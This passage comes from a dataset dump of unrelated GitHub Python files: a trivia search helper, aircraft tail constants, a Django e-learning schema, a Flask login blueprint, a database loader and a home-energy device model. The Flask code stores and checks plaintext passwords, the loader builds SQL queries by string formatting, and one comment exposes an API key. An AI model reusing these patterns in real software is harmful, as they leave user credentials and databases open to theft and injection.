# since inversions don't help in our queries,\n # we'll just drop them\n query_without_inversion[i] = \"\"\n\n colored_query_str = \" \".join(colored_query)\n query_without_inversion_str = \" \".join(query_without_inversion)\n self.logger.info(\"=================================\")\n self.logger.info(\"Query: \\\"{}\\\"\".format(colored_query_str))\n try:\n self.results = google.search(query_without_inversion_str, pages)\n except Exception as e:\n self.logger.error(\"Caught exception in google query: {}\".format(e))\n return False\n self.logger.info(\"Got {} results from the googz\".format(\n len(self.results)))\n if print_results:\n print(self.results)\n return True\n\n # def search_bing(self, query):\n # url = 'https://api.cognitive.microsoft.com/bing/v7.0/composite'\n # # query string parameters\n # payload = {'q': query}\n # # custom headers\n # headers = {'Ocp-Apim-Subscription-Key': '362ffe563af5458f8818a32a1a165d1b'}\n # # make GET request\n # r = requests.get(url, params=payload, headers=headers)\n # # get JSON response\n # j=r.json()\n # pp = pprint.PrettyPrinter(indent=4)\n # pp.pprint(j)\n\n def get_answer_permutations(self, answer):\n \"\"\"Finds reversed strings of the input words\n Args:\n answer (String): of a single answer\n Returns:\n (List): of answers strings to search for\n \"\"\"\n answers = []\n answers.append(answer)\n if len(answer.split()) > 1:\n words = answer.split()\n words.reverse()\n new_words = \" \".join(words)\n answers.append(new_words)\n self.logger.info(\"Adding answer permutation for {} -> {}\".format(\n answer, new_words))\n return answers\n\n def check_counts_failure(self, counts):\n \"\"\"\n Check if we got all zeros, spawn a web browser for last ditch effort\n Args:\n counts (List): of pairs containing each answer and\n the count frequency found in query\n \"\"\"\n all_zeros = True\n for c in counts:\n if c[1] != 0:\n all_zeros = False\n break\n if all_zeros:\n self.logger.info(\"Found all zeros, spawning chrome\")\n query_split = self.query.split()\n query_pluses = \"+\".join(query_split)\n webbrowser.open(\n \"https://www.google.com/search?q={}\".format(query_pluses))\n\n def answer_frequency(self, answers):\n \"\"\"Test frequency of occurance of each answer against the search results\n Args:\n answers (List): of strings containing each answer\n Returns:\n (OrderedDict): Dictionary of results, sorted by most probable\n \"\"\"\n # 
stage our output counts with the origin answer counts\n counts = {}\n for answer in answers:\n counts[answer] = 0\n\n # iterate through each answer and count the occurances in each result\n # description test\n for answer in answers:\n # Find additonal answers to search by reversing the order of the\n # words if there are multiple words\n answer_perms = self.get_answer_permutations(answer)\n # find frequency of each answer set (including any possible\n # reversed strings)\n for result in self.results:\n r = re.compile(\"|\".join(r\"\\b%s\\b\" % w for w in answer_perms))\n count_result = collections.Counter(\n re.findall(r, result.description.lower()))\n # update the running counts\n for _, value in count_result.items():\n counts[answer] = counts[answer] + value\n\n # sort the results depending on if an inversion is detected or not\n reverse = False if self.inversion else True\n counts = sorted(counts.items(), key=operator.itemgetter(1),\n reverse=reverse)\n self.logger.info(\"=================================\")\n self.logger.info(\"Permutation match results\")\n for i, c in enumerate(counts):\n if i == 0:\n self.logger.info(termcolor.colored(\n \"{} : {} <---------------\".format(c[0], c[1]), \"green\"))\n else:\n self.logger.info(termcolor.colored(\n \"{} : {}\".format(c[0], c[1]), \"red\"))\n self.logger.info(\"=================================\")\n\n self.check_counts_failure(counts)\n return counts\n\n def answer_frequency_fuzzy(self, answers):\n \"\"\"Test probability (0-100) of match of each answer within each description set\n Args:\n answers (List): of strings containing each answer\n Returns:\n (OrderedDict): Dictionary of results, sorted by most probable\n \"\"\"\n # stage our output counts with the origin answer counts\n counts = {}\n for answer in answers:\n counts[answer] = 0\n\n # iterate through each answer and count the occurances in each result\n # description test\n for answer in answers:\n # find frequency of each answer set using fuzzy techniques\n for result in self.results:\n val = fuzz.token_set_ratio(answer, result.description.lower())\n counts[answer] = counts[answer] + val\n\n # sort the results depending on if an inversion is detected or not\n reverse = False if self.inversion else True\n counts = sorted(counts.items(), key=operator.itemgetter(1),\n reverse=reverse)\n self.logger.info(\"=================================\")\n self.logger.info(\"Fuzzy match results\")\n for i, c in enumerate(counts):\n if i == 0:\n self.logger.info(termcolor.colored(\n \"{} : {} <---------------\".format(c[0], c[1]), \"green\"))\n else:\n self.logger.info(termcolor.colored(\n \"{} : {}\".format(c[0], c[1]), \"red\"))\n self.logger.info(\"=================================\")\n\n self.check_counts_failure(counts)\n return counts\n\n\nif __name__ == \"__main__\":\n wb = WebQuery()\n # wb.search_google(\"final cut pro is apple's software for doing what?\")\n # counts = wb.answer_frequency(\n # [\"editing video\", \"spreadsheets\", \"creating music\"])\n\n wb.search_google(\"stradivarius was famous for making what\")\n counts = wb.answer_frequency([\"spotify\", \"violins\", \"hearing aids\"])\n counts = wb.answer_frequency_fuzzy([\"spotify\", \"violins\", \"hearing aids\"])\n\n # wb.search_google(\n # \"L.A. officials attended the 1956 World Series with hopes of luring\\\n # which team to the West Coast?\")\n # counts = wb.answer_frequency(\n # [\"St. Louis Browns\", \"New York Giants\", \"Washington Senators\"])\n # counts = wb.answer_frequency_fuzzy(\n # [\"St. 
Louis Browns\", \"New York Giants\", \"Washington Senators\"])\n\n wb.search_google(\"What are the Bildungsroman genre of stories about\")\n counts = wb.answer_frequency(\n [\"roman empire\", \"coming of age\", \"unrequited love\"])\n counts = wb.answer_frequency_fuzzy(\n [\"roman empire\", \"coming of age\", \"unrequited love\"])\n\n # wb.search_google(\"what was the most downloaded iPhone app of 2016\")\n # counts = wb.answer_frequency([\"snapchat\", \"messenger\", \"pokemon go\"])\n","repo_name":"pickledgator/milliwatson","sub_path":"milliwatson/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":8841,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"40713673659","text":"\"\"\" \nName: Horizontal Tail\nDepartment: Aerodynamics\nLast updated: 05/06/2018 12:45 by Midas\n\"\"\"\n\nimport sys\nimport math as m\nsys.path.append('../')\n\ntoc = 0.09 # Thickness over chord\nx_trl = 0.05 # Transition point lower wing H-tail\nx_tru = 0.05 # Transition point upper wing H-tail\nC_Nh_alpha = 3.2389 # Normal force coefficient H-tail\nVh_v = 0.925 # V-ratio H-tail\ncl_de = 5.34 # Change in C_L due to elevator deflection","repo_name":"DSE23/main","sub_path":"Aircraft/Aerodynamics/HT.py","file_name":"HT.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"36396455149","text":"# s의 길이만큼 반복문을 순회하면서 인덱스 별로 split 후 오름차순 정렬\n\ns = input()\n\nstrings = []\nfor i in range(len(s)):\n strings.append(s[i:]) # 인덱스 별로 정렬 즉, s[0:], s[1:], s[2:], ... , s[len(s)-1:]\n\nfor word in sorted(strings): # 오름차순 정렬 후 출력\n print(word)\n","repo_name":"kimbackdoo/Algorithm","sub_path":"Python/BOJ/정렬/접미사 배열.py","file_name":"접미사 배열.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"22984464784","text":"from flask import Blueprint, request, jsonify, make_response\nfrom pythology.extensions import db\nfrom pythology.models import Student, Admin, Course\n\nauth_bp = Blueprint('auth', __name__)\n\n\n@auth_bp.route('/register', methods=['GET', 'POST'])\ndef register():\n data = request.get_json()\n print('receive data:', data)\n\n res = {}\n model_class = Admin if data['admin'] else Student\n existing_user = model_class.query.get(data['id'])\n print('existing_user:', existing_user)\n\n new_user = None\n if existing_user:\n res['msg'] = \"用户已存在\"\n res['status'] = 0\n else:\n print('model_class:', model_class)\n if data['admin']:\n new_user = Admin(\n id=data['id'],\n username=data['username'],\n password_hash=data['password'],\n school=data['school']\n )\n else:\n new_user = Student(\n id=data['id'],\n username=data['username'],\n password_hash=data['password'],\n gender=data['gender'],\n school=data['school'],\n major=data['major'],\n grade=data['grade']\n )\n\n if new_user:\n db.session.add(new_user)\n db.session.commit()\n res['msg'] = \"注册成功\"\n res['status'] = 1\n\n print('send res:', res)\n return jsonify(res)\n\n\n@auth_bp.route('/login', methods=['GET', 'POST'])\ndef login():\n data = request.get_json()\n print('receive data:', data)\n\n res = {}\n model_class = Admin if data['admin'] else Student\n user = model_class.query.get(data['id'])\n # 判断用户是否存在\n if user:\n # 判断密码是否正确\n if user.password_hash == data['password']:\n res['course'] = [course.to_dict() for course in user.courses]\n res['msg'] = \"登录成功\"\n res['username'] = user.username\n res['school'] = user.school\n res['id'] = user.id\n res['status'] = 1\n if not data['admin']:\n res['major'] = user.major\n res['grade'] = user.grade\n else:\n res['msg'] = \"学工号或密码错误\"\n res['status'] = 0\n else:\n res['msg'] = \"用户不存在,请检查学工号是否正确\"\n res['status'] = 0\n\n print('send res:', res)\n return jsonify(res)","repo_name":"chuanlukk/Pythology-server","sub_path":"pythology/blueprints/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"14899540735","text":"#!/usr/bin/env python3\nimport psycopg2\n\nfrom parse_data import parse_data\nimport json\n\n\ndef main():\n\n parsed_cases = parse_data()\n\n conn = None\n try:\n conn = psycopg2.connect(host=\"localhost\",\n database=\"expunge\",\n port='5432',\n user=\"danielsong\"\n )\n\n cur = conn.cursor()\n\n added_list = []\n\n for parsed_case in parsed_cases:\n # if parsed_case['person_id'] not in added_list:\n # cmd = \"INSERT INTO person (person_id, age) VALUES ({}, {})\".format(\"'\"+parsed_case['person_id']+\"'\", parsed_case['age'])\n # cur.execute(cmd)\n # added_list.append(parsed_case['person_id'])\n\n ##\n # cmd = \"INSERT INTO holds (person_id, case_number) VALUES ({}, {}) ON CONFLICT DO NOTHING\".format(\"'\" + parsed_case['person_id'] + \"'\", \"'\"+parsed_case['case_number']+\"'\")\n\n # if parsed_case['case_number'] not in added_list:\n # cmd = \"INSERT INTO cases(case_number, balance, location, violation_type) VALUES({}, {}, {}, {})\"\\\n # .format(\"'\"+parsed_case['case_number']+\"'\", parsed_case['balance'], \"'\"+parsed_case['location']+\"'\", \"'\"+parsed_case['violation_type']+\"'\")\n # cur.execute(cmd)\n # added_list.append(parsed_case['case_number'])\n for charge in parsed_case['charges']:\n cmd = \"INSERT INTO charges(case_number, eligibility, convicted) VALUES({}, {}, {})\".format(\"'\"+parsed_case['case_number']+\"'\", \"'\"+charge['eligibility']+\"'\", \"'\"+charge['convicted']+\"'\")\n cur.execute(cmd)\n\n\n\n\n conn.commit()\n cur.close()\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n finally:\n if conn is not None:\n conn.close()\n\n\nif __name__ == '__main__':\n main()","repo_name":"dsong127/dbFinal","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"23384475852","text":"from django.db import models\nfrom django.core import serializers\n\n\nclass Teacher(models.Model):\n full_name = models.CharField(max_length=100)\n details = models.TextField(null=True)\n email = models.EmailField(max_length=100, unique=True)\n password = models.CharField(max_length=100)\n mobile_no = models.CharField(max_length=20, unique=True)\n qualification = models.CharField(max_length=200)\n skills = models.TextField()\n\n class Meta:\n verbose_name_plural = \"4. Teachers\"\n\n def __str__(self):\n return self.full_name\n\n def skill_list(self):\n skill_list = self.skills.split(',')\n return skill_list\n\n # Total Courses\n def total_teacher_courses(self):\n total_courses = Course.objects.filter(teacher=self).count()\n return total_courses\n\n # Total Chapters\n def total_teacher_chapters(self):\n total_chapters = Chapter.objects.filter(course__teacher=self).count()\n return total_chapters\n\n # Total Students\n def total_teacher_students(self):\n total_students = StudentCourseEnrollment.objects.filter(\n course__teacher=self).count()\n return total_students\n\n#Teacher resume\nclass TeacherResume(models.Model):\n teacher = models.ForeignKey(Teacher, on_delete=models.CASCADE)\n resume=models.FileField()\n \n class Meta:\n verbose_name_plural= \"44. Teacher Resume\"\n\n def __str__(self):\n return self.teacher.full_name\n\n \n\n#Course Category\nclass CourseCategory(models.Model):\n title = models.CharField(max_length=150)\n description = models.TextField()\n\n class Meta:\n verbose_name_plural = \"1. Course Categories\"\n\n def __str__(self):\n return self.title\n\n\nclass Course(models.Model):\n category = models.ForeignKey(CourseCategory, on_delete=models.CASCADE)\n teacher = models.ForeignKey(Teacher, on_delete=models.CASCADE, related_name=\"teacher_courses\")\n title = models.CharField(max_length=150)\n tag_line = models.CharField(max_length=300, null=True)\n description = models.TextField()\n featured_img = models.ImageField(upload_to='course_img/', null=True)\n technologies = models.TextField(null=True)\n\n class Meta:\n verbose_name_plural = \"2. 
Courses\"\n\n def __str__(self):\n return f\"{self.title} -{self.teacher}\"\n \n def related_videos(self):\n related_videos = Course.objects.filter(technologies__icontains=self.technologies).exclude(id=self.id)\n return serializers.serialize('json', related_videos)\n\n def tech_list(self):\n tech_list = self.technologies.split(',')\n return tech_list\n\n def total_enrolled_students(self):\n total_enrolled_students = StudentCourseEnrollment.objects.filter(course=self).count()\n return total_enrolled_students\n\n # Students enrolled in training\n def training_enrolled_student(self):\n training_enrolled_student = StudentTrainingEnrollment.objects.filter(course=self).count()\n return training_enrolled_student\n\n def course_rating(self):\n course_rating = CourseRating.objects.filter(course=self).aggregate(avg_rating=models.Avg('rating'))\n return course_rating['avg_rating']\n\n # Student enrolled in traiing\n def Student_enrolled_traing(self, course_id):\n Student_enrolled_traing = StudentCourseEnrollment.objects.filter(course=course_id).count()\n\n# Chapter\nclass Chapter(models.Model):\n course = models.ForeignKey(\n Course, on_delete=models.CASCADE, related_name=\"course_chapter\")\n title = models.CharField(max_length=150)\n description = models.TextField()\n video = models.FileField(upload_to='chapter_videos/', null=True)\n note_file = models.FileField(upload_to='Chapter_notes/', null=True)\n remarks = models.TextField()\n\n class Meta:\n verbose_name_plural = \"3. Chapter\"\n\n def __str__(self):\n return self.title\n\n\n# Student\nclass Student(models.Model):\n full_name = models.CharField(max_length=100)\n username = models.CharField(max_length=50, unique=True, null=True)\n email = models.EmailField(max_length=100, unique=True)\n password = models.CharField(max_length=100)\n interests = models.TextField(null=True)\n profile_img=models.ImageField(upload_to='student_profile_imgs/',null=True)\n\n class Meta:\n verbose_name_plural = \"5. Students\"\n\n def __str__(self):\n return self.full_name\n\n # Total Enrolled Courses\n def enrolled_courses(self):\n enrolled_courses = StudentCourseEnrollment.objects.filter(student=self).count()\n return enrolled_courses\n\n # Total Favorite Courses\n def favorites_courses(self):\n favorites_courses = StudentFavoriteCourse.objects.filter(student=self).count()\n return favorites_courses\n\n # Completed Assignments\n def complete_assignments(self):\n complete_assignments = StudentAssignment.objects.filter(\n student=self,student_status=True).count()\n return complete_assignments\n\n # Pending Assignments\n def pending_assignments(self):\n pending_assignments = StudentAssignment.objects.filter(\n student=self,student_status=False).count()\n return pending_assignments\n\n\n# Favorite Course\nclass StudentFavoriteCourse(models.Model):\n course = models.ForeignKey(Course, on_delete=models.CASCADE)\n student = models.ForeignKey(Student, on_delete=models.CASCADE)\n status = models.BooleanField(default=False)\n\n class Meta:\n verbose_name_plural = \"9. Favorite Courses\"\n\n def __str__(self):\n return f\"{self.course} - {self.student}\"\n\n\n# Student course enrollment\nclass StudentCourseEnrollment(models.Model):\n course = models.ForeignKey(\n Course, on_delete=models.CASCADE, related_name=\"enrolled_courses\")\n student = models.ForeignKey(\n Student, on_delete=models.CASCADE, related_name=\"enrolled_student\")\n enrolled_time = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n verbose_name_plural = \"6. 
Student Course Enrollment\"\n\n def __str__(self):\n return f\"{self.course} - {self.student}\"\n\n\n# Course Rating and Reviews\nclass CourseRating(models.Model):\n course = models.ForeignKey(Course, on_delete=models.CASCADE)\n student = models.ForeignKey(Student, on_delete=models.CASCADE)\n rating = models.PositiveIntegerField(default=0)\n reviews = models.TextField(null=True)\n review_time = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n verbose_name_plural = \"7. Course Rating\"\n\n def __str__(self):\n return f\"{self.course.title} - {self.rating}\"\n\n\n# Training Details\nclass TrainingDetails(models.Model):\n course = models.ForeignKey(Course, on_delete=models.CASCADE)\n teacher = models.ForeignKey(Teacher, on_delete=models.CASCADE)\n date = models.DateField(\"Date\")\n f_time = models.TimeField(\"Time\")\n t_time = models.TimeField(\"Time\", null=True)\n meeting_link = models.URLField(max_length=200, null=True)\n\n class Meta:\n verbose_name_plural = \"8. Training Details\"\n\n def __str__(self):\n return f\"{self.teacher} - {self.course}\"\n\n # Students enrolled in training\n def training_enrolled_student(self):\n training_enrolled_student = StudentTrainingEnrollment.objects.filter(course=self).count()\n return training_enrolled_student\n\n# Training Enrollment\nclass StudentTrainingEnrollment(models.Model):\n course = models.ForeignKey(Course, on_delete=models.CASCADE, related_name=\"training_courses\")\n student = models.ForeignKey(Student, on_delete=models.CASCADE, related_name=\"training_student\")\n e_time = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n verbose_name_plural = \"90. Training Enrollment\"\n\n def __str__(self):\n return f\"{self.course} - {self.student}\"\n\n def user_course_list(self):\n course_list = models.auth_user.objects.filter(username='admin')\n return course_list\n\n\n\n\n# # Popular Courses\n# class PopularCourses(models.Model):\n# course = models.ForeignKey(Course, on_delete=models.CASCADE)\n# rating = models.ForeignKey(CourseRating, on_delete=models.CASCADE)\n\n# class Meta:\n# verbose_name_plural = \"900. Popular Courses\"\n\n# def __str__(self):\n# return f\"{self.course.title} - {self.rating.rating}\"\n\n\n\n# Assignment\nclass StudentAssignment(models.Model):\n teacher = models.ForeignKey(Teacher, on_delete=models.CASCADE,null=True)\n student = models.ForeignKey(Student, on_delete=models.CASCADE,null=True)\n title = models.CharField(max_length=200)\n detail = models.TextField(null=True)\n student_status = models.BooleanField(default=False, null=True)\n add_time = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n verbose_name_plural = \"55. Student Assignment\"\n\n def __str__(self):\n return f\"{self.title}\"\n \n\n#notification model\nclass Notification(models.Model):\n teacher=models.ForeignKey(Teacher,on_delete=models.CASCADE,null=True)\n student=models.ForeignKey(Student,on_delete=models.CASCADE,null=True)\n notif_subject=models.CharField(max_length=200,verbose_name='Notification Subject',null=True)\n notif_for=models.CharField(max_length=200,verbose_name='Notification For')\n notif_created_time=models.DateTimeField(auto_now_add=True)\n notifread_status=models.BooleanField(default=False,verbose_name='Notification Status')\n\n class Meta:\n verbose_name_plural = \"91. 
Notifications\"\n\n \n#quiz model\nclass Quiz(models.Model):\n teacher=models.ForeignKey(Teacher,on_delete=models.CASCADE,null=True)\n title=models.CharField(max_length=200)\n detail=models.TextField()\n add_time=models.DateTimeField(auto_now_add=True)\n\n class Meta:\n verbose_name_plural=\"92. Quiz\"\n\n def assign_status(self):\n return CourseQuiz.objects.filter(quiz=self).count()\n \n def __str__(self):\n return f\"{self.title}\"\n\n\n#quiz questions model\nclass QuizQuestions(models.Model):\n quiz=models.ForeignKey(Quiz,on_delete=models.CASCADE,null=True)\n questions=models.CharField(max_length=200)\n ans1=models.CharField(max_length=200)\n ans2=models.CharField(max_length=200)\n ans3=models.CharField(max_length=200)\n ans4=models.CharField(max_length=200)\n right_ans=models.CharField(max_length=200)\n add_time=models.DateTimeField(auto_now_add=True)\n\n class Meta:\n verbose_name_plural=\"93. Quiz Questions\"\n\n\n#Add Quiz to Course\nclass CourseQuiz(models.Model):\n teacher=models.ForeignKey(Teacher,on_delete=models.CASCADE,null=True)\n course=models.ForeignKey(Course,on_delete=models.CASCADE,null=True)\n quiz=models.ForeignKey(Quiz,on_delete=models.CASCADE,null=True)\n add_time=models.DateTimeField(auto_now_add=True)\n\n class Meta:\n verbose_name_plural=\"94. Course Quiz\"\n\n\n#Attempt Quiz question by student\nclass AttempQuiz(models.Model):\n student=models.ForeignKey(Student,on_delete=models.CASCADE,null=True)\n quiz=models.ForeignKey(Quiz,on_delete=models.CASCADE,null=True)\n question=models.ForeignKey(QuizQuestions,on_delete=models.CASCADE,null=True)\n right_ans=models.CharField(max_length=200,null=True)\n add_time=models.DateTimeField(auto_now_add=True)\n\n class Meta:\n verbose_name_plural=\"95. Attempted Questions\"\n\n\nclass StudyMaterial(models.Model):\n course = models.ForeignKey(Course, on_delete=models.CASCADE)\n title = models.CharField(max_length=150)\n description = models.TextField()\n upload = models.FileField(upload_to='study_materials/', null=True)\n remarks = models.TextField(null=True)\n\n class Meta:\n verbose_name_plural = \"96. Course Study Materials\"\n\n","repo_name":"Sudo-Ed-Tech/Edtech","sub_path":"lms_api/eLearning/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":11602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"35545177753","text":"\"\"\"Implementation of shiftable household devices like washing machines, dish washers or dryers.\n\nTakes load profiles and time windows, where the activation can be shifted within from LoadProfileGenerator and activates the device when surplus from PV is available.\nThe device is activated at the end of the time window when no surplus was available. This file contains the class SmartDevice and SmartDevice State,\nthe configuration is automatically adopted from the information provided by the LPG.\n\"\"\"\n# clean\n\n# Generic/Built-in\nimport json\nimport math as ma\nfrom os import path\nfrom typing import List\nfrom dataclasses import dataclass\nfrom dataclasses_json import dataclass_json\nimport pandas as pd\n\n\n# Owned\nfrom hisim import component as cp\nfrom hisim import loadtypes as lt\nfrom hisim import utils\nfrom hisim.simulationparameters import SimulationParameters\nfrom hisim.component import OpexCostDataClass\n\n__authors__ = \"Johanna Ganglbauer\"\n__copyright__ = \"Copyright 2021, the House Infrastructure Project\"\n__credits__ = [\"Noah Pflugradt\"]\n__license__ = \"MIT\"\n__version__ = \"0.1\"\n__maintainer__ = \"Vitor Hugo Bellotto Zago\"\n__email__ = \"vitor.zago@rwth-aachen.de\"\n__status__ = \"development\"\n\n\n@dataclass_json\n@dataclass\nclass SmartDeviceConfig(cp.ConfigBase):\n\n \"\"\"Configuration of the smart device.\"\"\"\n\n @classmethod\n def get_main_classname(cls):\n \"\"\"Returns the full class name of the base class.\"\"\"\n return SmartDevice.get_full_classname()\n\n name: str\n identifier: str\n source_weight: int\n smart_devices_included: bool\n\n @classmethod\n def get_default_config(cls):\n \"\"\"Gets a default config.\"\"\"\n return SmartDeviceConfig(\n name=\"Smart Device\",\n identifier=\"Identifier\",\n source_weight=1,\n smart_devices_included=True,\n )\n\n\nclass SmartDeviceState:\n\n \"\"\"State representing smart appliance.\"\"\"\n\n def __init__(\n self,\n actual_power: float = 0,\n timestep_of_activation: int = -999,\n time_to_go: int = 0,\n position: int = 0,\n ):\n \"\"\"Initilization of state.\n\n :param actual_power: power of smart appliance at given timestep, defaults to 0\n :type actual_power: float, optional\n :param timestep_of_activation: timestep, where the device was activated, defaults to -999\n :type timestep_of_activation: int, optional\n :param time_to_go: duration of the power profile, which follows for the nex time steps, defaults to 0\n :type time_to_go: int, optional\n :param position: index of demand profile relevent for the given timestep, defaults to 0\n :type position: int, optional\n \"\"\"\n self.actual_power = actual_power\n self.timestep_of_activation = timestep_of_activation\n self.time_to_go = time_to_go\n self.position = position\n\n def clone(self) -> \"SmartDeviceState\":\n \"\"\"Copy state efficiently.\"\"\"\n return SmartDeviceState(\n self.actual_power,\n self.timestep_of_activation,\n self.time_to_go,\n self.position,\n )\n\n def run(self, timestep: int, electricity_profile: List[float]) -> None:\n \"\"\"Check device state based on previous time step.\n\n :param timestep: timestep of simulation\n :type timestep: int\n :param electricity_profile: load profile of device for actual or next activation\n :type electricity_profile: List[float]\n \"\"\"\n # device activation\n if timestep > self.timestep_of_activation + self.time_to_go:\n self.timestep_of_activation = timestep\n self.time_to_go = len(electricity_profile)\n self.actual_power = electricity_profile[0]\n\n if 
timestep < self.timestep_of_activation + self.time_to_go:\n # device is running\n self.actual_power = electricity_profile[\n timestep - self.timestep_of_activation\n ]\n\n # device deactivation\n if timestep == self.timestep_of_activation + self.time_to_go:\n self.position = self.position + 1\n self.time_to_go = 0\n self.actual_power = 0\n\n\nclass SmartDevice(cp.Component):\n\n \"\"\"Smart device class.\n\n Class component that provides availablity and profiles of flexible smart devices like shiftable (in time) washing machines and dishwashers.\n Data provided or based on LPG exports.\n \"\"\"\n\n # mandatory Inputs\n L3DeviceActivation = \"l3_DeviceActivation\"\n\n # mandatory Outputs\n ElectricityOutput = \"ElectricityOutput\"\n\n # optional Inputs\n ElectricityTarget = \"ElectricityTarget\"\n\n def __init__(\n self, my_simulation_parameters: SimulationParameters, config: SmartDeviceConfig\n ):\n \"\"\"Initialize the class.\"\"\"\n\n super().__init__(\n name=config.identifier.replace(\"/\", \"-\") + \"_w\" + str(config.source_weight),\n my_simulation_parameters=my_simulation_parameters,\n my_config=config,\n )\n\n self.build(\n identifier=config.identifier,\n source_weight=config.source_weight,\n seconds_per_timestep=my_simulation_parameters.seconds_per_timestep,\n )\n self.previous_state: SmartDeviceState\n self.state: SmartDeviceState\n self.consumption = 0\n if my_simulation_parameters.surplus_control and config.smart_devices_included:\n postprocessing_flag = [\n lt.InandOutputType.ELECTRICITY_CONSUMPTION_EMS_CONTROLLED,\n lt.ComponentType.SMART_DEVICE,\n ]\n else:\n postprocessing_flag = [\n lt.InandOutputType.ELECTRICITY_CONSUMPTION_UNCONTROLLED\n ]\n\n # mandatory Output\n self.electricity_output_channel: cp.ComponentOutput = self.add_output(\n object_name=self.component_name,\n field_name=self.ElectricityOutput,\n load_type=lt.LoadTypes.ELECTRICITY,\n unit=lt.Units.WATT,\n postprocessing_flag=postprocessing_flag,\n output_description=\"Electricity output\",\n )\n\n self.electricity_target_channel: cp.ComponentInput = self.add_input(\n object_name=self.component_name,\n field_name=self.ElectricityTarget,\n load_type=lt.LoadTypes.ELECTRICITY,\n unit=lt.Units.WATT,\n mandatory=False,\n )\n\n def i_save_state(self) -> None:\n \"\"\"Saves the state.\"\"\"\n self.previous_state = self.state.clone()\n\n def i_restore_state(self) -> None:\n \"\"\"Restores the state.\"\"\"\n self.state = self.previous_state.clone()\n\n def i_doublecheck(self, timestep: int, stsv: cp.SingleTimeStepValues) -> None:\n \"\"\"Doublechecks.\"\"\"\n pass\n\n def i_prepare_simulation(self) -> None:\n \"\"\"Prepares the simulation.\"\"\"\n pass\n\n def i_simulate(\n self, timestep: int, stsv: cp.SingleTimeStepValues, force_convergence: bool\n ) -> None:\n \"\"\"Iteration in smart appliance like washing mashine, dish washer or dryer.\n\n :param timestep: timestep of simulation\n :type timestep: int\n :param stsv: _description_\n :type stsv: cp.SingleTimeStepValues\n :param force_convergence: _description_\n :type force_convergence: bool\n \"\"\"\n\n # initialize power\n self.state.actual_power = 0\n\n # if not already running: check if activation makes sense\n if timestep > self.state.timestep_of_activation + self.state.time_to_go:\n if timestep > self.earliest_start[self.state.position]: # can be turnod on\n # initialize next activation\n activation: float = timestep + 10\n # if surplus controller is connected get related signal\n if self.electricity_target_channel.source_output is not None:\n electricity_target = 
stsv.get_input_value(self.electricity_target_channel)\n if (\n electricity_target\n >= self.electricity_profile[self.state.position][0]\n ):\n activation = timestep\n # if last possible switch on force activation\n if (\n timestep >= self.latest_start[self.state.position]\n ): # needs to be activated\n activation = timestep\n\n if timestep == activation:\n self.state.run(\n timestep, self.electricity_profile[self.state.position]\n )\n\n # run device if it was already activated\n else:\n self.state.run(timestep, self.electricity_profile[self.state.position])\n\n stsv.set_output_value(self.electricity_output_channel, self.state.actual_power)\n\n def build(\n self, identifier: str, source_weight: int, seconds_per_timestep: int = 60\n ) -> None:\n \"\"\"Initialization of Smart Device information.\n\n :param identifier: name of smart device in LPG\n :type identifier: str\n :param source_weight: priority of smart device in Energy Management System\n :type source_weight: int\n :param seconds_per_timestep: time step size, defaults to 60\n :type seconds_per_timestep: int, optional\n :raises NameError: _description_\n :raises TypeError: _description_\n \"\"\"\n\n # load smart device profile\n smart_device_profile = []\n filepath = path.join(\n utils.HISIMPATH[\"utsp_reports\"], \"FlexibilityEvents.HH1.json\"\n )\n with open(filepath, encoding=\"utf-8\") as file:\n smart_device_profile = json.load(file)\n\n if not smart_device_profile:\n raise NameError(\n \"LPG data for smart appliances is missing or located missleadingly\"\n )\n\n # initializing relevant data\n earliest_start, latest_start, electricity_profile = [], [], []\n\n minutes_per_timestep = seconds_per_timestep / 60\n\n if not minutes_per_timestep.is_integer():\n raise TypeError(\n \"Up to now smart appliances have only been implemented for time resolutions corresponding to multiples of one minute\"\n )\n minutes_per_timestep = int(minutes_per_timestep)\n\n # reading in data from json file and adopting to given time resolution\n for sample in smart_device_profile:\n device_name = str(sample[\"Device\"][\"Name\"])\n if device_name == identifier:\n # earliest start in given time resolution -> integer value\n x_sample = sample[\"EarliestStart\"][\"ExternalStep\"]\n # skip if occurs in calibration days (negative sign )\n if x_sample < 0:\n continue\n # timestep (in minutes) the profile is shifted in the first step of the external time resolution\n offset = minutes_per_timestep - x_sample % minutes_per_timestep\n # earliest start in given time resolution -> float value\n x_sample = x_sample / minutes_per_timestep\n # latest start in given time resolution\n y_sample = sample[\"LatestStart\"][\"ExternalStep\"] / minutes_per_timestep\n # number of timesteps in given time resolution -> integer value\n z_sample = ma.ceil(\n x_sample + sample[\"TotalDuration\"] / minutes_per_timestep\n ) - ma.floor(x_sample)\n # earliest and latest start in new time resolution -> integer value\n earliest_start.append(ma.floor(x_sample))\n latest_start.append(ma.ceil(y_sample))\n\n # get shiftable load profile\n el_shiftable_load = (\n sample[\"Profiles\"][2][\"TimeOffsetInSteps\"] * [0]\n + sample[\"Profiles\"][2][\"Values\"]\n )\n\n # average profiles given in 1 minute resolution to given time resolution\n elem_el = []\n # append first timestep which may not fill the entire 15 minutes\n elem_el.append(sum(el_shiftable_load[:offset]) / offset)\n\n i = 0\n for i in range(z_sample - 2):\n elem_el.append(\n sum(\n el_shiftable_load[\n offset\n + minutes_per_timestep * 
